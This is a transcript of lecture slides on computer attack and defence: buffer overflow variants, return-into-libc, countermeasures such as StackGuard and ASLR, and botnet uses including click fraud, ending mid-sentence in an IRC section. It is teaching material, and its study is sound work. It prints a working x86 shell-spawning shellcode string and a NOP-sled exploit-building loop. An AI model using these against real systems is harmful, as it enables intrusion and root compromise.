Transcript C&C
The Attack and Defense of Computers
Dr. 許富皓
1
Attacking Program Bugs
2
Attack Types
Buffer Overflow Attacks:
Stack Smashing attacks
Return-into-libc attacks
Heap overflow attacks
Function pointer attacks
.dtors overflow attacks.
setjmp/longjmp buffer overflow attacks.
Format string attacks:
Integer overflow and integer sign attacks
3
Why Buffer Overflow Attacks
Are So Dangerous?
Easy to launch:
Attackers can launch a buffer overflow attack simply by
sending a crafted string to their targets.
Plenty of targets:
Plenty of programs have this kind of vulnerability.
Cause great damage:
Usually the end result of a buffer overflow attack is that the
attacker gains root privilege on the attacked host.
Internet worms proliferate through buffer
overflow attacks.
4
Stack Smashing Attacks
5
Principle of Stack Smashing
Attacks
Overwrite control transfer structures, such
as return addresses or function pointers, to
redirect program execution flow to the desired
code.
Attack strings carry both code and
address(es) of the code entry point.
6
Explanation of BOAs (1)
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[100];
    int i;
    while((c[i++]=getch())!=EOF)
    {
    }
}
Input String: xyz
Stack layout (high addresses first):
    G’s stack frame
    b
    return address add_g
    address of G’s frame pointer
    C[99]                  (H’s stack frame)
    ...
    0xabc: Z
    0xabb: Y
    0xaba: X               (C[0])
7
Explanation of BOAs (2)
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[100];
    int i;
    while((c[i++]=getch())!=EOF)
    {
    }
}
Attack String: xxInjected Codexy0xabc
Length=108 bytes
Stack layout after the overflow (high addresses first):
    b
    return address add_g           <- overwritten with address 0xabc
    address of G’s frame pointer   <- overwritten with y, x
    C[99]                          (H’s stack frame)
    Injected Code                  (starts at 0xabc)
    0xabb: x
    0xaba: x                       (C[0])
8
Injected Code:
The attacked programs usually have root privilege;
therefore, the injected code is executed with root
privilege.
The injected code is already in machine instruction
form; therefore, a CPU can directly execute it.
However the above fact also means that the injected code
must match the CPU type of the attacked host.
Usually the injected code will fork a shell; hence,
after an attack, an attacker could have a root shell.
9
Injected Code of Remote BOAs
In order to be able to interact with the newly
forked root shell, the injected code usually
needs to execute the following two steps:
Open a socket.
Redirect standard input and output of the newly
forked root shell to the socket.
10
Example of Injected Code for
X86 Architecture : Shell Code
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
    "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
11
Two Factors for A Successful
Buffer Overflow-style Attack(1)
A successful buffer overflow-style attack
must overflow the right place (e.g. the
location that holds a return address) with
the correct value (e.g. the address of the
injected code’s entry point).
12
Two Factors for A Successful
Buffer Overflow-style Attack(2)
Layout of the attack:
    buffer where the overflow starts: holds the injected code
    overflow target (return address): receives the address of the
    injected code’s entry point
Offset: the distance between the beginning of the
overflowed buffer and the overflow target.
The offset and the entry point address are unpredictable. They cannot
be determined just by looking at the source code or a local binary.
13
Unpredictable Offset
For performance reasons, most compilers don’t
allocate memory for local variables in the order
they appear in the source code, and sometimes
padding is inserted between them. (Source
code doesn’t help.)
Different compilers and OSes use different allocation
strategies. (Local binaries don’t help.)
Address obfuscation inserts a random amount of
space between local variables and the return address.
(Only very good luck may help.)
14
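Unpredictable Entry Point
Address
[fhsu@ecsl]# webserver –a –b security
Stack contents at program start (high addresses first):
    0xbfffffff
    system data
    environment variables
    argument strings
    env pointers
    argv pointers
    argc
    Function main()’s stack frame
Everything above main()’s stack frame holds the command line
arguments and environment variables. Because the size of that
region changes with the command line and the environment, the
address of main()’s stack frame changes as well.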
15
Strategies Used by Attackers to
Increase Their Success Chance
Repeat address patterns.
Insert NOP (0x90) operations before the
entry point of injected code.
16
Exploit Code Web Sites
Exploit World
milw0rm
Metasploit
Securiteam
17
An Exploit Code Generation
Program
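This program uses the following three loops to
generate the attack string that contains the
shell code.
/* 1. fill the whole buffer with the guessed address */
for(i=0;i<sizeof(buff);i+=4)
*(ptr++)=jump;
/* 2. overwrite the front part with NOPs (0x90) */
for(i=0;i<sizeof(buff)-200-strlen(evil);i++)
buff[i]=0x90;
/* 3. place the shell code right after the NOPs */
for(j=0;j<strlen(evil);j++)
buff[i++]=evil[j];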
18
Return-into-libc Attacks
19
Return-into-libc
A variant of buffer overflow attacks.
Utilizes code already residing in the attacked
program’s address space, such as libc
functions.
Attack strings carry the entry point address(es)
of a desired libc function, a new frame
pointer address, and parameters to the
function.
20
How Parameters and Local Variables
Are Represented in an Object File?
abc(int aa)
{   int bb;
    bb=aa;
    :
    :
}
abc:
    function prologue
    *(%ebp-4)=*(%ebp+8)
    function epilogue
Stack frame of abc (high addresses first):
    aa                        at 8(%ebp)
    return address            at 4(%ebp)
    previous frame pointer    <- %ebp
    bb                        at -4(%ebp)
21
A Way to Change the Parameters and
Local Variables of a Function.
A parameter or a local variable in an object file is
represented by the offset between the position
pointed to by %ebp and its own position.
Therefore, the value of the %ebp register determines
where a function finds its parameters and local
variables.
In other words, if an attacker can change the %ebp
of a function, then she/he can also change the
function’s parameters and local variables.
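The effect of changing %ebp can be illustrated with a small simulation. This is only a sketch: the array `stack`, the index `ebp`, and the helpers `read_param` and `read_local` are hypothetical stand-ins for real memory and the real register, with one array slot per 4-byte word.

```c
#include <assert.h>
#include <stddef.h>

/* Simulated stack: one slot per 4-byte word, higher index = higher address.
   All names here are illustrative, not taken from a real ABI header. */
enum { STACK_WORDS = 16 };

/* Read the first parameter the way compiled code does: at a fixed
   offset of +2 words from the frame pointer, i.e. 8(%ebp). */
int read_param(const int *stack, size_t ebp)
{
    assert(stack != NULL && ebp + 2 < STACK_WORDS);
    return stack[ebp + 2];
}

/* Read the first local variable: -1 word, i.e. -4(%ebp). */
int read_local(const int *stack, size_t ebp)
{
    assert(stack != NULL && ebp >= 1 && ebp < STACK_WORDS);
    return stack[ebp - 1];
}
```

Calling both helpers with the genuine frame pointer and then with a different one returns different values from the same code, which is exactly what a return-into-libc attack relies on.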
22
Function Prologue and Epilogue
#include <stdio.h>
int add_three_items(int a, int b, int c)
{   int d;
    d=a+b+c;
    return d;
}

add_three_items:
    pushl %ebp              # (3) function prologue
    movl  %esp, %ebp
    subl  $4, %esp
    movl  12(%ebp), %eax
    addl  8(%ebp), %eax
    addl  16(%ebp), %eax
    movl  %eax, -4(%ebp)
    movl  -4(%ebp), %eax
    leave                   # (4) function epilogue
    ret

leave = movl %ebp,%esp
        popl %ebp
23
Function Calls
main()
{   int a, b,c,f;
    extern int add_three_items();
    a=1;
    b=2;
    c=3;
    f=add_three_items(a,b,c);
}

main:
    pushl %ebp
    movl  %esp, %ebp
    subl  $24, %esp
    andl  $-16, %esp
    movl  $0, %eax
    subl  %eax, %esp
    movl  $1, -4(%ebp)
    movl  $2, -8(%ebp)
    movl  $3, -12(%ebp)
    subl  $4, %esp
    pushl -12(%ebp)         # (1) push the arguments, last one first
    pushl -8(%ebp)
    pushl -4(%ebp)
    call  add_three_items   # (2) call the function
    addl  $16, %esp         # (5) remove the arguments from the stack
    movl  %eax, -16(%ebp)
    leave
    ret

leave = movl %ebp,%esp
        popl %ebp
24
Example code
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
main(int argc, char *argv[]) {
function(1,2,3);
}
gcc -S test.c;
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
leave
ret
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
pushl $3
pushl $2
pushl $1
call function
addl $12, %esp
leave
ret
25
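Memory layout during the call to function() (high addresses first;
bp and sp mark the current frame pointer and stack pointer):
high
    ret addr (EIP)
    %ebp
    …
    $3
    $2
    $1
    ret addr (EIP)
    %ebp
    …
    heap
    bss
low
leave =
    movl %ebp, %esp
    popl %ebp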
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
leave
ret
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
pushl $3
pushl $2
pushl $1
call function
addl $12, %esp
leave
ret
26
Explanation of Return-into-libc
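G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[10];
    /* overflow occurs here */
}
abc: pushl %ebp
     movl %esp,%ebp
Stack (high addresses first), original content -> content after the overflow:
    (slot above b)                -> parameter 1, e.g. pointer to /bin/sh
    b                             -> any value
    return address add_g          -> address of abc(), e.g. system()
    address of G’s frame pointer  -> any value
    C[9]                          (H’s stack frame)
    ...
    C[0]
%ebp and %esp still delimit H’s stack frame.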
27
Explanation of Return-into-libc
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[10];
    /* overflow occurs here */
}
abc: pushl %ebp
     movl %esp,%ebp
After movl %ebp,%esp (an instruction in the function epilogue of H):
    (slot above b)                -> parameter 1, e.g. pointer to /bin/sh
    b                             -> any value
    return address add_g          -> address of abc(), e.g. system()
    address of G’s frame pointer  -> any value      <- %esp, %ebp
    C[9]                          (H’s stack frame)
    ...
    C[0]
28
Explanation of Return-into-libc
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[10];
    /* overflow occurs here */
}
abc: pushl %ebp
     movl %esp,%ebp
After popl %ebp (%ebp now holds "any value"):
    (slot above b)                -> parameter 1, e.g. pointer to /bin/sh
    b                             -> any value
    return address add_g          -> address of abc(), e.g. system()   <- %esp
    address of G’s frame pointer  -> any value
    C[9]                          (H’s stack frame)
    ...
    C[0]
29
Explanation of Return-into-libc
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[10];
    /* overflow occurs here */
}
abc: pushl %ebp
     movl %esp,%ebp
After ret (execution continues at abc(), e.g. system(); %ebp holds "any value"):
    (slot above b)                -> parameter 1, e.g. pointer to /bin/sh
    b                             -> any value      <- %esp
    return address add_g          -> address of abc(), e.g. system()
    address of G’s frame pointer  -> any value
    C[9]                          (H’s stack frame)
    ...
    C[0]
30
Explanation of Return-into-libc
G(int a)
{
    H(3);
add_g:
}
H(int b)
{   char c[10];
    /* overflow occurs here */
}
abc: pushl %ebp
     movl %esp,%ebp
After the following two instructions in function system()’s
function prologue are executed
    pushl %ebp
    movl %esp, %ebp
the positions of %esp and %ebp are as shown:
    (slot above b)                -> parameter 1, e.g. pointer to /bin/sh
    b                             -> any value
    return address add_g          -> any value (pushed %ebp)   <- %esp, %ebp
    address of G’s frame pointer  -> any value
    C[9]                          (H’s stack frame)
    ...
    C[0]
system() therefore finds parameter 1 at 8(%ebp).
31
Properties of Return-into-libc Attacks
The exploit strings don’t need to contain
executable code.
32
Heap/Data/BSS Overflow Attacks
33
Principle of Heap/Data/BSS
Overflow Attacks
Similar to stack smashing attacks, attackers
overflow a sensitive data structure by giving a
buffer adjacent to it more data than the buffer
can store, so that the excess data overwrites
the sensitive data structure.
The sensitive data structure may contain:
• A function pointer
• A pointer to a string
• … and so on.
Both the buffer and the sensitive data structure
may be located in the heap, data, or bss section.
34
Heap and Data/BSS Sections
The heap is an area of memory that the application
allocates dynamically through a library call
such as malloc().
On most systems, the heap grows up (towards higher
addresses).
The data section is initialized at compile-time.
The bss section contains uninitialized data, and is
allocated at run-time.
Until it is written to, it remains zeroed (at least from
the application's point of view).
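A short program can make the three regions visible. The sketch below is illustrative only: the variable names and the helper `print_section_addresses` are made up for this example, and the addresses printed depend on the compiler, the OS, and the run.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

int initialized_counter = 42;   /* data section: value stored in the executable */
int zeroed_counter;             /* bss section: zero-filled when the program starts */

/* Print where one object from each region lives in this run. */
void print_section_addresses(void)
{
    char *heap_buf = malloc(16);            /* heap: allocated at run-time */
    assert(heap_buf != NULL);
    printf("data: %p\n", (void *)&initialized_counter);
    printf("bss : %p\n", (void *)&zeroed_counter);
    printf("heap: %p\n", (void *)heap_buf);
    free(heap_buf);
}
```

Calling `print_section_addresses()` from `main()` typically shows the data and bss addresses close together and the heap address elsewhere, but no particular ordering is guaranteed.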
35
Heap Overflow Example
#define BUFSIZE 16
int main()
{ int i=0;
char *buf1 = (char *)malloc(BUFSIZE);
char *buf2 = (char *)malloc(BUFSIZE);
:
while((*(buf1+i)=getchar())!=EOF)
i++;
:
}
36
BSS Overflow Example
#define BUFSIZE 16
int main(int argc, char **argv)
{ FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
:
tmpfile = "/tmp/vulprog.tmp";
gets(buf);
tmpfd = fopen(tmpfile, "w");
:
}
37
BSS and Function Pointer Overflow
Example
int goodfunc(const char *str);
int main(int argc, char **argv)
{ int i=0;
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);
:
while((*(buf+i)=getchar())!=EOF)
i++;
:
}
38
Function Pointer Attacks
39
Principle of Function Pointer Attacks
Use a buffer adjacent to a function pointer
variable to overwrite the content of
the function pointer variable so that it
points to code chosen by the attacker.
A function pointer variable may be located in
the stack section, the data section, or the
bss section.
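The adjacency that such an attack depends on, and a bounded write that avoids it, can be sketched as follows. The type `struct record`, the constant `NAME_LEN`, and the function `record_set_name` are hypothetical names chosen for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum { NAME_LEN = 16 };

/* Hypothetical record: a buffer followed by a function pointer. */
struct record {
    char name[NAME_LEN];
    int (*handler)(const char *);
};

/* Bounded copy: never writes past `name`, so `handler` cannot be reached.
   Returns 0 on success, -1 if the input (plus its NUL) does not fit. */
int record_set_name(struct record *r, const char *src)
{
    assert(r != NULL && src != NULL);
    size_t n = strlen(src);
    if (n >= NAME_LEN)
        return -1;
    memcpy(r->name, src, n + 1);   /* n + 1 copies the terminating NUL too */
    return 0;
}
```

Because `handler` is laid out after `name`, an unchecked copy of a long string into `name` would run into it; the length check is what keeps the pointer intact.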
40
Countermeasures of
Buffer Overflow Attacks
41
Countermeasures of Buffer
Overflow Attacks (1)
Array bounds checking.
Non-executable stack/heap.
Safe C library.
Compiler solutions, e.g.,
StackGuard
RAD
Type safe language, e.g. Java.
Static source code analysis.
42
Countermeasures of Buffer
Overflow Attacks (2)
Anomaly Detection, e.g. through system
calls.
Dynamic allocation of memory for data that
will overwrite adjacent memory area.
Memory Address Obfuscation/ASLR
Randomization of executable Code.
Network-based buffer overflow detection
43
Array Bounds Checking
Fundamental solution for all kinds of buffer
overflow attacks.
High run-time overhead (up to about 100% in some
situations)
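What a bounds check adds to every array access can be sketched in a few lines. The helper `checked_store` is a hypothetical name; a bounds-checking compiler would generate an equivalent test automatically, which is where the run-time overhead comes from.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Store `value` at buf[index] only if the index lies inside the array.
   Returns false instead of writing when the index is out of bounds. */
bool checked_store(char *buf, size_t len, size_t index, char value)
{
    assert(buf != NULL);
    if (index >= len)
        return false;      /* refuse instead of overwriting a neighbor */
    buf[index] = value;
    return true;
}
```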
44
Non-executable Stack/Heap
The majority of buffer overflow attacks are
stack smashing attacks; therefore, a non-executable
stack could block the majority of
buffer overflow attacks.
Disables some existing system functionality, e.g.
signal handling and nested functions.
45
Safe C Library
Some string-related C library functions, such as
strcpy and strcat, don’t check the
boundaries of destination buffers; hence,
modifying these kinds of unsafe library functions
could secure programs that use these functions.
Replace strcpy with strncpy, or replace
strcat with strncat, … and so on.
Plenty of other C statements could still result in
buffer overflow vulnerabilities.
E.g. while ((*(ptr+i)=getchar())!=EOF)
i++;
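A bounded version of the loop above might look like the following sketch. The function name `read_bounded` and its parameters are assumptions made for this example; the point is only that the capacity is checked before every store and that the result is always NUL-terminated (which strncpy alone does not guarantee when it truncates).

```c
#include <assert.h>
#include <stdio.h>

/* Read characters from `in` until EOF, storing at most cap-1 of them.
   The result is always NUL-terminated. Returns the number stored. */
size_t read_bounded(FILE *in, char *buf, size_t cap)
{
    assert(in != NULL && buf != NULL && cap > 0);
    size_t i = 0;
    int ch;                         /* int, so EOF is distinguishable from data */
    while (i + 1 < cap && (ch = getc(in)) != EOF)
        buf[i++] = (char)ch;
    buf[i] = '\0';
    return i;
}
```

Input beyond the capacity is simply left unread here; a real program would have to decide whether to discard it or report an error.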
46
Compiler Solutions: StackGuard
Put a canary word before each return address in
each stack frame. Usually, when a buffer overflow
attack is launched, not only the return address but
also the canary word is overwritten; thus, by
checking the integrity of the canary word before a
function returns, this mechanism can defend against
stack smashing attacks.
Low performance overhead.
Changes the layout of the stack frame of a function;
hence, this mechanism is not compatible with
some programs, e.g. debuggers.
Only protects return addresses.
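The canary check can be illustrated with a simulated stack frame. This is a sketch, not StackGuard's implementation: the frame is modeled as a plain byte array, and the layout constants, the canary value, and the function names are all hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Simulated frame layout (low to high): buffer | canary | return address. */
enum { BUF_LEN = 16, CANARY_OFF = 16, RET_OFF = 20, FRAME_LEN = 24 };

static const unsigned char CANARY[4] = { 0x00, 0x0d, 0x0a, 0xff }; /* illustrative value */

/* Prologue: clear the frame and place the canary below the return address. */
void frame_init(unsigned char *frame)
{
    assert(frame != NULL);
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + CANARY_OFF, CANARY, sizeof CANARY);
}

/* Models an unchecked copy into the buffer. The clamp to FRAME_LEN only
   keeps this simulation itself memory-safe. */
void unchecked_copy(unsigned char *frame, const unsigned char *src, size_t n)
{
    assert(frame != NULL && src != NULL);
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(frame, src, n);
}

/* Epilogue check: true if the canary is intact, so returning is safe. */
bool canary_intact(const unsigned char *frame)
{
    assert(frame != NULL);
    return memcmp(frame + CANARY_OFF, CANARY, sizeof CANARY) == 0;
}
```

A copy of BUF_LEN bytes leaves the canary intact, while a copy long enough to reach the return address at RET_OFF must pass over the canary first, so the epilogue check fails.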
47
Compiler Solutions: RAD
Store extra copies of return addresses in a well-protected
area, the Return Address Repository (RAR).
When a function is called, in addition to saving its return
address in its corresponding stack frame, another
copy of its return address is saved in the RAR. When
the function finishes, before returning to its caller,
the callee checks the return address in its stack
frame to see whether the RAR has a copy of that
address. If there is no such address in the RAR,
a buffer overflow alarm is raised.
Low performance overhead.
Only protects return addresses.
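The bookkeeping can be sketched as a second stack of saved addresses. This is a simplified model rather than RAD's actual code: `struct rar`, `rar_push`, and `rar_check_and_pop` are hypothetical names, the protection of the repository itself is not modeled, and only the most recent saved copy is compared.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

enum { RAR_CAPACITY = 64 };

/* Simulated Return Address Repository: a separate stack of saved copies. */
struct rar {
    uintptr_t saved[RAR_CAPACITY];
    size_t depth;
};

/* Function prologue: record a copy of the return address. */
bool rar_push(struct rar *r, uintptr_t ret_addr)
{
    assert(r != NULL);
    if (r->depth == RAR_CAPACITY)
        return false;
    r->saved[r->depth++] = ret_addr;
    return true;
}

/* Function epilogue: compare the address found in the stack frame with the
   saved copy. Returns false when they differ or nothing was saved,
   which corresponds to raising an alarm. */
bool rar_check_and_pop(struct rar *r, uintptr_t ret_addr_in_frame)
{
    assert(r != NULL);
    if (r->depth == 0)
        return false;
    return r->saved[--r->depth] == ret_addr_in_frame;
}
```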
48
Type Safe Language, e.g. Java
These kinds of languages automatically
perform array bounds checking.
The majority of programs are not written in
these kinds of languages; rewriting all
programs in such languages
is impractical.
49
Static Source Code Analysis.
Analyze source code to find potential
program statements that could result in
buffer overflow vulnerabilities. E.g.
program statements like
while((*(buf+i)=getchar())!=EOF)
i++;
are not safe.
Produces false positives and false negatives.
The source code may be difficult to obtain.
50
Anomaly Detection
This mechanism is based on the idea that
most malicious code that is run on a target
system will make system calls to access
certain system resources, such as files and
sockets.
This technique has two main parts:
Preprocessing
monitoring.
Produces false positives and false negatives.
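The two parts can be sketched with a very small model: preprocessing records which system call was seen directly after which during normal runs, and monitoring counts adjacent pairs that were never recorded. The pair-based profile, the numeric call IDs, and all names below are assumptions made for this example, not a description of a specific detector.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

enum { MAX_SYSCALL = 32 };   /* hypothetical number of distinct call IDs */

/* seen[a][b] is true if call b was observed right after call a in training. */
struct profile {
    bool seen[MAX_SYSCALL][MAX_SYSCALL];
};

static bool valid_id(int id)
{
    return id >= 0 && id < MAX_SYSCALL;
}

/* Preprocessing: learn the adjacent pairs of a normal trace. */
void profile_train(struct profile *p, const int *trace, size_t n)
{
    assert(p != NULL && trace != NULL);
    for (size_t i = 0; i + 1 < n; i++) {
        assert(valid_id(trace[i]) && valid_id(trace[i + 1]));
        p->seen[trace[i]][trace[i + 1]] = true;
    }
}

/* Monitoring: count adjacent pairs that never occurred during training. */
size_t profile_anomalies(const struct profile *p, const int *trace, size_t n)
{
    assert(p != NULL && trace != NULL);
    size_t unseen = 0;
    for (size_t i = 0; i + 1 < n; i++) {
        assert(valid_id(trace[i]) && valid_id(trace[i + 1]));
        if (!p->seen[trace[i]][trace[i + 1]])
            unseen++;
    }
    return unseen;
}
```

A normal behavior that never appeared in training is reported as an anomaly (false positive), and an attack that only uses known pairs goes unnoticed (false negative).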
51
Memory Address Obfuscation/ASLR
This approach randomizes the layout of
items in main memory; hence attackers can
only guess the address where their injected
code resides and the address of their target
functions.
Changes the run-time memory layout
specified by the original file format.
Increases the complexity of debugging a
program.
52
Aspects of Address Obfuscation (1)
The first is the randomization of the base
addresses of memory regions.
This involves the randomization of the base address of
• the stack
• the heap
• the starting address of dynamically linked libraries
• the locations of functions and static data structures contained in
the executable.
The second aspect includes permuting the order of
variables and functions.
53
Aspects of Address Obfuscation(2)
The last is the introduction of random
length gaps, such as
padding in stack frames
padding between malloc allocations
padding between variables and static data
structures
random length gaps in the code segment, with
jumps to get over them.
54
Randomization of executable Code
This method involves the randomization of the code that is
executed in a process.
This approach encrypts instructions of a process, and
decrypts instructions when they are prepared to be
executed. Because attackers don’t know the key to encrypt
their code, their injected code can not be decrypted
correctly. As a result their code can not be executed.
The main assumption of this method is that most attacks
that attempt to gain control of a system are code-injection
attacks.
Needs special hardware to keep the performance overhead acceptable.
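The principle can be shown with a toy model in which "encryption" is a single-byte XOR. This is only a sketch under that assumption: real schemes use stronger keys and do the decoding in an emulator or in hardware, and the function name `xor_with_key` is made up for this example.

```c
#include <assert.h>
#include <stddef.h>

/* XOR every byte with a per-process key. XOR is its own inverse, so the
   same routine models both the encoding done at load time and the
   decoding done when instructions are fetched. */
void xor_with_key(unsigned char *code, size_t n, unsigned char key)
{
    assert(code != NULL);
    for (size_t i = 0; i < n; i++)
        code[i] ^= key;
}
```

Legitimate code passes through the routine twice (encode, then decode) and comes out unchanged. Injected bytes were never encoded, so they pass through only once, at fetch time, and reach the CPU as different bytes than the attacker intended.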
55
Botnet [Trend Micro]
56
Definition of a Botnet
A botnet (zombie army or drone army)
refers to a pool of compromised computers
that are under the command of a single
hacker, or a small group of hackers, known
as a botmaster.
57
Definition of a Bot
A bot refers to a compromised end-host, or
a computer, which is a member of a botnet.
58
The First Bot Generation Malware PrettyPark
The first bot generation malware, PrettyPark
worm, appeared in 1999.
A critical difference between PrettyPark and
previous worms is that it makes use of IRC as a
means to allow a botmaster to remotely control a
large pool of compromised hosts.
Its revolutionary idea of using IRC as a discrete
and extensible method for Command and Control
(C&C) was soon adopted by the black hat
community.
59
How Fast Could Your Computer Be
Compromised?
Based on the observation of an unpatched version of
Windows 2000 or Windows XP located within a dial-in
network of a German ISP.
Normally it takes only a couple of minutes before it is successfully
compromised.
On average, the expected lifespan of the honeypot is less than ten
minutes.
• After this small amount of time, the honeypot is often successfully
exploited by automated malware.
The shortest compromise time was only a few seconds:
• Once we plugged the network cable in, an SDBot compromised the
machine via an exploit against TCP port 135 and installed itself on
the machine.
60
Typical Size of Botnets
Some botnets consist of only a few hundred
bots.
In contrast, several large botnets with
up to 50,000 hosts were also observed.
Botnets with several hundred
thousand hosts have been reported in the
past.
61
A Host May Be Infected by Several
Botnets Simultaneously
A home computer which got infected by 16
different bots has been found.
62
Taxonomy of Botnets
Attacking behavior
C&C models
Rally mechanisms
Communication protocols
Observable botnet activities
Evasion Techniques
63
Attacking Behavior [Paul Bächer et al.]
Distributed Denial-of-Service Attacks
Spamming
Sniffing Traffic
Keylogging
Spreading new malware
Installing Advertisement Addons
Google AdSense abuse
Manipulating online polls/games
Mass identity theft
64
Distributed Denial-of-Service
Attacks (1)
Often botnets are used for Distributed Denial-of-Service (DDoS) attacks.
A DDoS attack is an attack on a computer system
or network that causes
a loss of service to users, typically the loss of network
connectivity and services
by
consuming the bandwidth of the victim network
or
overloading the computational resources of the victim
system.
65
Distributed Denial-of-Service
Attacks (2)
Further research showed that botnets are even
used to run commercial DDoS attacks against
competing corporations:
Operation Cyberslam documents the story of Jay R.
Echouafni and Joshua Schichtel alias EMP.
Echouafni was indicted on August 25, 2004 on
multiple charges of conspiracy and causing damage to
protected computers. He worked closely together with
EMP who ran a botnet to send bulk mail and also
carried out DDoS attacks against the spam blacklist
servers.
In addition, they took Speedera - a global on-demand
computing platform - offline when they ran a paid
DDoS attack to take a competitor's website down.
66
Spamming
Some bots offer the possibility to open a SOCKS v4/v5
proxy - a generic proxy protocol for TCP/IP-based
networking applications (RFC 1928) - on a compromised
machine.
Some bots also implement a special function to harvest
email-addresses.
After having enabled the SOCKS proxy, this machine can
then be used for nefarious tasks such as spamming.
With the help of a botnet and thousands of bots, an attacker is able
to send massive amounts of bulk email (spam).
Often that spam you are receiving was sent from, or proxied
through, an old Windows computer at home.
In addition, this can of course also be used to send phishing-mails
since phishing is a special case of spam.
67
Sniffing Traffic
Bots can also use a packet sniffer to watch for
interesting clear-text data passing by a
compromised machine.
The sniffers are mostly used to retrieve sensitive
information like usernames and passwords.
If a machine is compromised more than once and
is also a member of more than one botnet, packet
sniffing makes it possible to gather the key information of
the other botnet. Thus it is possible to "steal"
another botnet.
68
Keylogging
If the compromised machine uses encrypted
communication channels (e.g. HTTPS or POP3S), then
just sniffing the network packets on the victim's computer
is useless since the appropriate key to decrypt the packets
is missing.
With the help of a keylogger it is very easy for an attacker
to retrieve sensitive information.
An implemented filtering mechanism (e.g. "I am only interested in
key sequences near the keyword 'paypal.com'") further helps in
stealing secret data.
And if you imagine that this keylogger runs on thousands of
compromised machines in parallel you can imagine how quickly
PayPal accounts are harvested.
69
Spreading New Malware
In most cases, botnets are used to spread
new bots. This is very easy since all bots
implement mechanisms to download and
execute a file via HTTP or FTP.
Spreading an email virus using a botnet is a
very nice idea, too.
A botnet with 10,000 hosts which acts as the
start base for the mail virus allows very fast
spreading and thus causes more harm.
70
Installing Advertisement Addons
Botnets can also be used to gain financial advantages.
This works by setting up a fake website with some
advertisements:
The operator of this website negotiates a deal with some hosting
companies that pay for clicks on ads.
With the help of a botnet, these clicks can be "automated" so that
instantly a few thousand bots click on the pop-ups.
This process can be further enhanced if the bot hijacks the
start-page of a compromised machine so that the "clicks"
are executed each time the victim uses the browser.
71
Google AdSense Abuse
A similar abuse is also possible with Google's AdSense
program:
AdSense offers companies the possibility to display Google
advertisements on their own website and earn money this way.
The company earns money due to clicks on these ads, for example
per 10,000 clicks in one month.
An attacker can abuse this program by leveraging his botnet to
click on these advertisements in an automated fashion and thus
artificially increments the click counter.
This kind of usage for botnets is relatively uncommon, but not a
bad idea from an attacker's perspective.
72
Loss Caused by Click Fraud [Catherine
Holahan]
On average, consultants estimate that
between 14% and 15% of clicks are
fraudulent.
73
Google Search Page
74
Google Search Result Page
75
Source HTML File of the Google
Search Result Page
76
Ampersands (&'s) in URLs [Liam Quinn ]
Always use &amp; in place of & when
writing URLs in HTML:
E.g.:
<a
href="foo.cgi?chapter=1&amp;section=2&amp;copy=
3&amp;lang=en">...</a>
77
Click Fraud (1) - Use the Browser’s
URL Field
78
Click Fraud (2) – Connect to the
Google Server Directly
Attackers could launch the same attacks by
opening an HTTP connection to a Google server
and
sending the URL in the previous slide to the
above server directly.
79
Click Fraud (3) - Use Fake Page (1)
80
Click Fraud (3) - Use Fake Page (2) [Mr. 東]
81
Click Fraud (3) - Use Fake Page (3)
82
Manipulating online Polls/Games
Since every bot has a distinct IP address,
every vote will have the same credibility as
a vote cast by a real person.
Online games can be manipulated in a
similar way. Currently we are aware of bots
being used that way, and there is a chance
that this will get more important in the
future.
83
Mass Identity Theft
Often the combination of different functionality described above can
be used for large scale identity theft, one of the fastest growing crimes
on the Internet.
Bogus emails ("phishing mails") that pretend to be legitimate (such as
fake PayPal or banking emails) ask their intended victims to go
online and submit their private information.
These fake emails are generated and sent by bots via their spamming
mechanism.
These same bots can also host multiple fake websites pretending to be
eBay, PayPal, or a bank, and harvest personal information.
Just as quickly as one of these fake sites is shut down, another one can
pop up.
In addition, keylogging and sniffing of traffic can also be used for
identity theft.
84
What Is IRC, and How Does It Work? [David
Caraballo et al.]
IRC (Internet Relay Chat) provides a way of
communicating in real time with people from all over the
world.
It consists of various separate networks (or "nets") of IRC
servers, machines that allow users to connect to IRC.
The largest nets are
EFnet (the original IRC net, often having more than 32,000 people
at once),
Undernet,
IRCnet,
DALnet,
and NewNet.
85
IRC Client
Generally, the user (such as you) runs a program
(called a "client") to connect to a server on one of
the IRC nets.
The server relays information to and from other
servers on the same net.
Recommended clients:
UNIX/shell: ircII
Windows: mIRC
Macintosh clients
86
IRC Bot [Wikipedia]
An IRC bot is a set of scripts or an
independent program that connects to
Internet Relay Chat as a client, and so
appears to other IRC users as another user.
It differs from a regular client in that instead
of providing interactive access to IRC for a
human user, it performs automated
functions.
87
IRC Channels
Once connected to an IRC server on an IRC network, you
will usually join one or more "channels" and converse
with others there.
On IRC, channels are where people meet and chat.
You may know them as "chat rooms".
Channel names usually begin with a #, as in #irchelp.
Conversations may be
public (where everyone in a channel can see what you type)
or
